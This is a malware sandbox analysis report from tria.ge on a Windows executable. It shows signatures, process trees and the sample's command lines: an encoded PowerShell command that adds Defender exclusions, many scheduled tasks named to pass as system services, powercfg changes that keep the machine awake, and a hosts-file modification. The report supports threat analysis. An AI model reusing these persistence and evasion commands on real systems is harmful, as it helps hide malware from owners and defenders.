Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
284s -
max time network
288s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
06/01/2023, 22:17
Static task
static1
Behavioral task
behavioral1
Sample
6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe
Resource
win10-20220901-en
General
-
Target
6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe
-
Size
1.2MB
-
MD5
ba53c8e0f9791f8e5f45e2c02e733f13
-
SHA1
d69647626d0beb5779450916a4fa89d3e4adb2bb
-
SHA256
6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb
-
SHA512
2d5e61fbb3e7364217a0eaad88f7fa8cf92b611cd0b5a56fe55bf8db050e323b1ab5940ea05ad14238de52d66d2a07e8cf1b542954919f763483c7e9d0c6cbd0
-
SSDEEP
24576:Dkyrk3eXEORnGOLogpmdhrquAgBh6jbgtca+ZuJ:YeUsRKkUtcM
Malware Config
Signatures
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 325515914-aoz988JA16Qh6yGQ.exe -
Executes dropped EXE 2 IoCs
pid Process 1204 325515914-aoz988JA16Qh6yGQ.exe 4688 RegSvc.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4548 schtasks.exe 2160 schtasks.exe 5024 schtasks.exe 4088 schtasks.exe 1856 schtasks.exe 4080 schtasks.exe 1340 schtasks.exe 5012 schtasks.exe 4560 schtasks.exe 3308 schtasks.exe 4444 schtasks.exe 4060 schtasks.exe 3516 schtasks.exe 4984 schtasks.exe 1904 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1204 325515914-aoz988JA16Qh6yGQ.exe 4904 powershell.exe 4904 powershell.exe 4904 powershell.exe 4904 powershell.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2672 6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe Token: SeDebugPrivilege 1204 325515914-aoz988JA16Qh6yGQ.exe Token: SeDebugPrivilege 4904 powershell.exe Token: SeShutdownPrivilege 5048 powercfg.exe Token: SeCreatePagefilePrivilege 5048 powercfg.exe Token: SeShutdownPrivilege 2844 powercfg.exe Token: SeCreatePagefilePrivilege 2844 powercfg.exe Token: SeShutdownPrivilege 4684 powercfg.exe Token: SeCreatePagefilePrivilege 4684 powercfg.exe Token: SeShutdownPrivilege 436 powercfg.exe Token: SeCreatePagefilePrivilege 436 powercfg.exe Token: SeShutdownPrivilege 3156 powercfg.exe Token: SeCreatePagefilePrivilege 3156 powercfg.exe Token: SeShutdownPrivilege 3156 powercfg.exe Token: SeCreatePagefilePrivilege 3156 powercfg.exe Token: SeDebugPrivilege 4688 RegSvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2672 wrote to memory of 1204 2672 6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe 66 PID 2672 wrote to memory of 1204 2672 6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe 66 PID 2672 wrote to memory of 1204 2672 6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe 66 PID 1204 wrote to memory of 5036 1204 325515914-aoz988JA16Qh6yGQ.exe 69 PID 1204 wrote to memory of 5036 1204 325515914-aoz988JA16Qh6yGQ.exe 69 PID 1204 wrote to memory of 5036 1204 325515914-aoz988JA16Qh6yGQ.exe 69 PID 5036 wrote to memory of 4904 5036 cmd.exe 71 PID 5036 wrote to memory of 4904 5036 cmd.exe 71 PID 5036 wrote to memory of 4904 5036 cmd.exe 71 PID 1204 wrote to memory of 4936 1204 325515914-aoz988JA16Qh6yGQ.exe 72 PID 1204 wrote to memory of 4936 1204 325515914-aoz988JA16Qh6yGQ.exe 72 PID 1204 wrote to memory of 4936 1204 325515914-aoz988JA16Qh6yGQ.exe 72 PID 1204 wrote to memory of 3164 1204 325515914-aoz988JA16Qh6yGQ.exe 73 PID 1204 wrote to memory of 3164 1204 325515914-aoz988JA16Qh6yGQ.exe 73 PID 1204 wrote to memory of 3164 1204 325515914-aoz988JA16Qh6yGQ.exe 73 PID 1204 wrote to memory of 5056 1204 325515914-aoz988JA16Qh6yGQ.exe 74 PID 1204 wrote to memory of 5056 1204 325515914-aoz988JA16Qh6yGQ.exe 74 PID 1204 wrote to memory of 5056 1204 325515914-aoz988JA16Qh6yGQ.exe 74 PID 1204 wrote to memory of 5080 1204 325515914-aoz988JA16Qh6yGQ.exe 75 PID 1204 wrote to memory of 5080 1204 325515914-aoz988JA16Qh6yGQ.exe 75 PID 1204 wrote to memory of 5080 1204 325515914-aoz988JA16Qh6yGQ.exe 75 PID 1204 wrote to memory of 1028 1204 325515914-aoz988JA16Qh6yGQ.exe 76 PID 1204 wrote to memory of 1028 1204 325515914-aoz988JA16Qh6yGQ.exe 76 PID 1204 wrote to memory of 1028 1204 325515914-aoz988JA16Qh6yGQ.exe 76 PID 1204 wrote to memory of 660 1204 325515914-aoz988JA16Qh6yGQ.exe 77 PID 1204 wrote to memory of 660 1204 325515914-aoz988JA16Qh6yGQ.exe 77 PID 1204 wrote to memory of 660 1204 325515914-aoz988JA16Qh6yGQ.exe 77 PID 1204 wrote to memory of 1328 1204 325515914-aoz988JA16Qh6yGQ.exe 79 PID 1204 wrote to memory of 1328 1204 325515914-aoz988JA16Qh6yGQ.exe 79 PID 1204 wrote to memory of 1328 1204 325515914-aoz988JA16Qh6yGQ.exe 79 PID 1204 wrote to memory of 1816 1204 325515914-aoz988JA16Qh6yGQ.exe 81 PID 1204 wrote to memory of 1816 1204 325515914-aoz988JA16Qh6yGQ.exe 81 PID 1204 wrote to memory of 1816 1204 325515914-aoz988JA16Qh6yGQ.exe 81 PID 1204 wrote to memory of 1524 1204 325515914-aoz988JA16Qh6yGQ.exe 83 PID 1204 wrote to memory of 1524 1204 325515914-aoz988JA16Qh6yGQ.exe 83 PID 1204 wrote to memory of 1524 1204 325515914-aoz988JA16Qh6yGQ.exe 83 PID 1204 wrote to memory of 304 1204 325515914-aoz988JA16Qh6yGQ.exe 85 PID 1204 wrote to memory of 304 1204 325515914-aoz988JA16Qh6yGQ.exe 85 PID 1204 wrote to memory of 304 1204 325515914-aoz988JA16Qh6yGQ.exe 85 PID 1204 wrote to memory of 2340 1204 325515914-aoz988JA16Qh6yGQ.exe 87 PID 1204 wrote to memory of 2340 1204 325515914-aoz988JA16Qh6yGQ.exe 87 PID 1204 wrote to memory of 2340 1204 325515914-aoz988JA16Qh6yGQ.exe 87 PID 1204 wrote to memory of 4092 1204 325515914-aoz988JA16Qh6yGQ.exe 88 PID 1204 wrote to memory of 4092 1204 325515914-aoz988JA16Qh6yGQ.exe 88 PID 1204 wrote to memory of 4092 1204 325515914-aoz988JA16Qh6yGQ.exe 88 PID 1204 wrote to memory of 704 1204 325515914-aoz988JA16Qh6yGQ.exe 90 PID 1204 wrote to memory of 704 1204 325515914-aoz988JA16Qh6yGQ.exe 90 PID 1204 wrote to memory of 704 1204 325515914-aoz988JA16Qh6yGQ.exe 90 PID 1204 wrote to memory of 2304 1204 325515914-aoz988JA16Qh6yGQ.exe 92 PID 1204 wrote to memory of 2304 1204 325515914-aoz988JA16Qh6yGQ.exe 92 PID 1204 wrote to memory of 2304 1204 325515914-aoz988JA16Qh6yGQ.exe 92 PID 1204 wrote to memory of 3956 1204 325515914-aoz988JA16Qh6yGQ.exe 96 PID 1204 wrote to memory of 3956 1204 325515914-aoz988JA16Qh6yGQ.exe 96 PID 1204 wrote to memory of 3956 1204 325515914-aoz988JA16Qh6yGQ.exe 96 PID 4936 wrote to memory of 1856 4936 cmd.exe 102 PID 4936 wrote to memory of 1856 4936 cmd.exe 102 PID 4936 wrote to memory of 1856 4936 cmd.exe 102 PID 3164 wrote to memory of 4060 3164 cmd.exe 104 PID 3164 wrote to memory of 4060 3164 cmd.exe 104 PID 3164 wrote to memory of 4060 3164 cmd.exe 104 PID 5056 wrote to memory of 4548 5056 cmd.exe 103 PID 5056 wrote to memory of 4548 5056 cmd.exe 103 PID 5056 wrote to memory of 4548 5056 cmd.exe 103 PID 5080 wrote to memory of 4560 5080 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe"C:\Users\Admin\AppData\Local\Temp\6147a8896c15a367f51c6eff3309f58196d72efc6ff756e4e55ff74cc9d26bfb.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\325515914-aoz988JA16Qh6yGQ.exe"C:\Users\Admin\AppData\Local\Temp\325515914-aoz988JA16Qh6yGQ.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powershell -EncodedCommand "PAAjAHEAWABYAEEAaABXAGgAYgB1AHkAYgBJAHEARgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEATABlAHYAcQBHAGkAagBFAEUAUQBRAFgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHoAUgBFAHkAQgBlAGcAaQBLAFkAYQB6AE8AYQBXAEYAYgAjAD4AIABAACgAIAA8ACMAQQBaAHAAWQBnAGwAZwBzAG4AagB0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBQAEoAagBTAEMAUABXAEIAYgBRAHcAdQB4AGwAWQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcQBEAEEASwBhAEkAbQBWAFEAZwBXAEsAZwBMAGsAVgBTACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEQAUwBNAEsAbwBXAHkAaABVAEwAcQBjAHMAbgBqACMAPgA="3⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHEAWABYAEEAaABXAGgAYgB1AHkAYgBJAHEARgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFEATABlAHYAcQBHAGkAagBFAEUAUQBRAFgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHoAUgBFAHkAQgBlAGcAaQBLAFkAYQB6AE8AYQBXAEYAYgAjAD4AIABAACgAIAA8ACMAQQBaAHAAWQBnAGwAZwBzAG4AagB0ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBQAEoAagBTAEMAUABXAEIAYgBRAHcAdQB4AGwAWQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAcQBEAEEASwBhAEkAbQBWAFEAZwBXAEsAZwBMAGsAVgBTACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEQAUwBNAEsAbwBXAHkAaABVAEwAcQBjAHMAbgBqACMAPgA="4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1856
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4060
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4548
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4560
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:1028
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3516
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:660
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4080
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:1328
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:2160
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:1816
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3308
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk462" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:1524
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk462" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1340
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk190" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:304
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk190" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk501" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:2340
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk501" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4444
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk498" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:4092
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk498" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:4984
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:704
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:5024
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f3⤵PID:2304
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\SysWOW64\powercfg.exepowercfg /hibernate off4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3156
-
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f4⤵
- Creates scheduled task(s)
PID:1904
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f3⤵PID:3956
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f4⤵
- Creates scheduled task(s)
PID:4088
-
-
-
-
C:\ProgramData\RuntimeBrokerData\RegSvc.exeC:\ProgramData\RuntimeBrokerData\RegSvc.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4688
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
72KB
MD5677f415e841a0febe53c9709eb10d0f3
SHA15d97e32c547038ba8b0da45f7a662c1a5413c3fe
SHA256274a320fac1071cb2cac3a8cbfa410ec4e60980a9669d0bc3287cd869c7b99f1
SHA512a35e80b5cf32788e0dc8ecd8d9b3a6193c9993f6a4c40d196107ba3bc805bf038fa7181b3b90910a8161390f7b2285ac1a705b191e008a7a1b05bc1e2b591d33
-
Filesize
72KB
MD5677f415e841a0febe53c9709eb10d0f3
SHA15d97e32c547038ba8b0da45f7a662c1a5413c3fe
SHA256274a320fac1071cb2cac3a8cbfa410ec4e60980a9669d0bc3287cd869c7b99f1
SHA512a35e80b5cf32788e0dc8ecd8d9b3a6193c9993f6a4c40d196107ba3bc805bf038fa7181b3b90910a8161390f7b2285ac1a705b191e008a7a1b05bc1e2b591d33
-
Filesize
452KB
MD5d9e81ea22cab99178c4e7bf5892e33c7
SHA1fbde8aad0b3b2201a42fcefdde6654dbdbd339af
SHA2564dae7b8e4f7a0a31eda8c4083a024a2fb6821d6dacca28adec35aa118a407207
SHA512213176f396e0bb76264bc2a0a2bb895e891d7282bb6e8f9df2eed123cd9460afd4e0e0d74e1e3b62f8b2e16285fdf0be40d8b48547e2e292fc11b6757860930b
-
Filesize
452KB
MD5d9e81ea22cab99178c4e7bf5892e33c7
SHA1fbde8aad0b3b2201a42fcefdde6654dbdbd339af
SHA2564dae7b8e4f7a0a31eda8c4083a024a2fb6821d6dacca28adec35aa118a407207
SHA512213176f396e0bb76264bc2a0a2bb895e891d7282bb6e8f9df2eed123cd9460afd4e0e0d74e1e3b62f8b2e16285fdf0be40d8b48547e2e292fc11b6757860930b